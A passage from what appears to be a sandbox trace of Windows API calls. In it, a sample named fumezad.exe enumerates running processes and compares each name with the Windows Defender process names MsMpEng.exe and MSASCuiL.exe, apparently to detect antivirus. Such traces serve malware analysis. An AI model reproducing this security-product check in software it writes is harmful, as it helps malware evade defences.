(lpString1="fumezad.exe", lpString2="MsMpEng.exe") returned -1 [0128.250] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x874, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x844, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0128.251] lstrcmpiW (lpString1="cmd.exe", lpString2="MsMpEng.exe") returned -1 [0128.251] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x844, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0128.251] lstrcmpiW (lpString1="cmd.exe", lpString2="MsMpEng.exe") returned -1 [0128.251] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x844, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 0 [0128.252] CloseHandle (hObject=0xec) returned 1 [0128.252] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xe8 [0128.257] Process32FirstW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0128.257] lstrcmpiW (lpString1="[System Process]", lpString2="MSASCuiL.exe") returned -1 [0128.257] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0128.258] lstrcmpiW (lpString1="System", lpString2="MSASCuiL.exe") returned 1 [0128.258] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0128.259] lstrcmpiW (lpString1="smss.exe", lpString2="MSASCuiL.exe") returned 1 [0128.259] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0128.259] lstrcmpiW (lpString1="csrss.exe", lpString2="MSASCuiL.exe") returned -1 [0128.260] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0128.260] lstrcmpiW (lpString1="wininit.exe", lpString2="MSASCuiL.exe") returned 1 [0128.260] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0128.261] lstrcmpiW (lpString1="csrss.exe", lpString2="MSASCuiL.exe") returned -1 [0128.261] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0128.261] lstrcmpiW (lpString1="winlogon.exe", lpString2="MSASCuiL.exe") returned 1 [0128.261] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0128.262] lstrcmpiW (lpString1="services.exe", lpString2="MSASCuiL.exe") returned 1 [0128.262] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0128.263] lstrcmpiW (lpString1="lsass.exe", lpString2="MSASCuiL.exe") returned -1 [0128.263] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0128.264] lstrcmpiW (lpString1="lsm.exe", lpString2="MSASCuiL.exe") returned -1 [0128.264] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.264] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCuiL.exe") returned 1 [0128.264] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.265] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCuiL.exe") returned 1 [0128.265] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.266] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCuiL.exe") returned 1 [0128.266] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.266] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCuiL.exe") returned 1 [0128.266] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.267] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCuiL.exe") returned 1 [0128.267] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0128.267] lstrcmpiW (lpString1="audiodg.exe", lpString2="MSASCuiL.exe") returned -1 [0128.267] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.268] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCuiL.exe") returned 1 [0128.268] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.269] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCuiL.exe") returned 1 [0128.269] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x450, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0128.269] lstrcmpiW (lpString1="dwm.exe", lpString2="MSASCuiL.exe") returned -1 [0128.269] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x448, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0128.270] lstrcmpiW (lpString1="explorer.exe", lpString2="MSASCuiL.exe") returned -1 [0128.270] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0128.271] lstrcmpiW (lpString1="spoolsv.exe", lpString2="MSASCuiL.exe") returned 1 [0128.271] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0128.272] lstrcmpiW (lpString1="taskhost.exe", lpString2="MSASCuiL.exe") returned 1 [0128.272] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.274] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCuiL.exe") returned 1 [0128.274] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x548, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0128.275] lstrcmpiW (lpString1="OfficeClickToRun.exe", lpString2="MSASCuiL.exe") returned 1 [0128.275] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0128.276] lstrcmpiW (lpString1="ONENOTEM.EXE", lpString2="MSASCuiL.exe") returned 1 [0128.276] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0128.277] lstrcmpiW (lpString1="taskeng.exe", lpString2="MSASCuiL.exe") returned 1 [0128.277] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d4, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0128.278] lstrcmpiW (lpString1="taskhost.exe", lpString2="MSASCuiL.exe") returned 1 [0128.278] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="cdt_philadelphia.exe")) returned 1 [0128.279] lstrcmpiW (lpString1="cdt_philadelphia.exe", lpString2="MSASCuiL.exe") returned -1 [0128.279] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="pipesemesteraccepted.exe")) returned 1 [0128.280] lstrcmpiW (lpString1="pipesemesteraccepted.exe", lpString2="MSASCuiL.exe") returned 1 [0128.280] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="midwest-prostate.exe")) returned 1 [0128.281] lstrcmpiW (lpString1="midwest-prostate.exe", lpString2="MSASCuiL.exe") returned -1 [0128.281] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x430, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="edmonton cell.exe")) returned 1 [0128.282] lstrcmpiW (lpString1="edmonton cell.exe", lpString2="MSASCuiL.exe") returned -1 [0128.283] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="approx_comparisons.exe")) returned 1 [0128.284] lstrcmpiW (lpString1="approx_comparisons.exe", lpString2="MSASCuiL.exe") returned -1 [0128.284] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="compliant.exe")) returned 1 [0128.285] lstrcmpiW (lpString1="compliant.exe", lpString2="MSASCuiL.exe") returned -1 [0128.285] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="memovisitorslover.exe")) returned 1 [0128.286] lstrcmpiW (lpString1="memovisitorslover.exe", lpString2="MSASCuiL.exe") returned -1 [0128.286] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="fixes.exe")) returned 1 [0128.287] lstrcmpiW (lpString1="fixes.exe", lpString2="MSASCuiL.exe") returned -1 [0128.287] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="lower-newfoundland-checks.exe")) returned 1 [0128.288] lstrcmpiW (lpString1="lower-newfoundland-checks.exe", lpString2="MSASCuiL.exe") returned -1 [0128.288] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x308, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="practice sees.exe")) returned 1 [0128.289] lstrcmpiW (lpString1="practice sees.exe", lpString2="MSASCuiL.exe") returned 1 [0128.289] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="mind.exe")) returned 1 [0128.290] lstrcmpiW (lpString1="mind.exe", lpString2="MSASCuiL.exe") returned -1 [0128.290] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x70c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="autos.exe")) returned 1 [0128.291] lstrcmpiW (lpString1="autos.exe", lpString2="MSASCuiL.exe") returned -1 [0128.291] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="succeed spirit.exe")) returned 1 [0128.292] lstrcmpiW (lpString1="succeed spirit.exe", lpString2="MSASCuiL.exe") returned 1 [0128.292] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="joseph saskatchewan.exe")) returned 1 [0128.293] lstrcmpiW (lpString1="joseph saskatchewan.exe", lpString2="MSASCuiL.exe") returned -1 [0128.293] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x80c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="enrolled-lebanon.exe")) returned 1 [0128.294] lstrcmpiW (lpString1="enrolled-lebanon.exe", lpString2="MSASCuiL.exe") returned -1 [0128.294] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x81c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="pay_adapter.exe")) returned 1 [0128.295] lstrcmpiW (lpString1="pay_adapter.exe", lpString2="MSASCuiL.exe") returned 1 [0128.295] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x82c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="mod.exe")) returned 1 [0128.296] lstrcmpiW (lpString1="mod.exe", lpString2="MSASCuiL.exe") returned -1 [0128.296] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x83c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="completing-h.exe")) returned 1 [0128.298] lstrcmpiW (lpString1="completing-h.exe", lpString2="MSASCuiL.exe") returned -1 [0128.298] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="water granny.exe")) returned 1 [0128.299] lstrcmpiW (lpString1="water granny.exe", lpString2="MSASCuiL.exe") returned 1 [0128.299] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x85c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="somebody finder.exe")) returned 1 [0128.300] lstrcmpiW (lpString1="somebody finder.exe", lpString2="MSASCuiL.exe") returned 1 [0128.300] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x86c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="pathology refrigerator horror.exe")) returned 1 [0128.301] lstrcmpiW (lpString1="pathology refrigerator horror.exe", lpString2="MSASCuiL.exe") returned 1 [0128.301] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x87c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="villagenodestrengths.exe")) returned 1 [0128.302] lstrcmpiW (lpString1="villagenodestrengths.exe", lpString2="MSASCuiL.exe") returned 1 [0128.302] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x88c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="luther.exe")) returned 1 [0128.303] lstrcmpiW (lpString1="luther.exe", lpString2="MSASCuiL.exe") returned -1 [0128.303] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x948, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="WINWORD.EXE")) returned 1 [0128.304] lstrcmpiW (lpString1="WINWORD.EXE", lpString2="MSASCuiL.exe") returned 1 [0128.304] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.304] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCuiL.exe") returned 1 [0128.304] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="OSPPSVC.EXE")) returned 1 [0128.305] lstrcmpiW (lpString1="OSPPSVC.EXE", lpString2="MSASCuiL.exe") returned 1 [0128.305] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xba0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0128.306] lstrcmpiW (lpString1="sppsvc.exe", lpString2="MSASCuiL.exe") returned 1 [0128.306] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.307] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCuiL.exe") returned 1 [0128.307] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x900, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x8bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0128.308] lstrcmpiW (lpString1="cmd.exe", lpString2="MSASCuiL.exe") returned -1 [0128.308] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0128.309] lstrcmpiW (lpString1="conhost.exe", lpString2="MSASCuiL.exe") returned -1 [0128.309] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x900, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0128.310] lstrcmpiW (lpString1="powershell.exe", lpString2="MSASCuiL.exe") returned 1 [0128.310] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x844, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x240, pcPriClassBase=8, dwFlags=0x0, szExeFile="fumezad.exe")) returned 1 [0128.311] lstrcmpiW (lpString1="fumezad.exe", lpString2="MSASCuiL.exe") returned -1 [0128.311] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x874, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x844, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0128.312] lstrcmpiW (lpString1="cmd.exe", lpString2="MSASCuiL.exe") returned -1 [0128.312] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x844, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0128.313] lstrcmpiW (lpString1="cmd.exe", lpString2="MSASCuiL.exe") returned -1 [0128.313] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x844, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 0 [0128.314] CloseHandle (hObject=0xe8) returned 1 [0128.314] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xec [0128.319] Process32FirstW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, 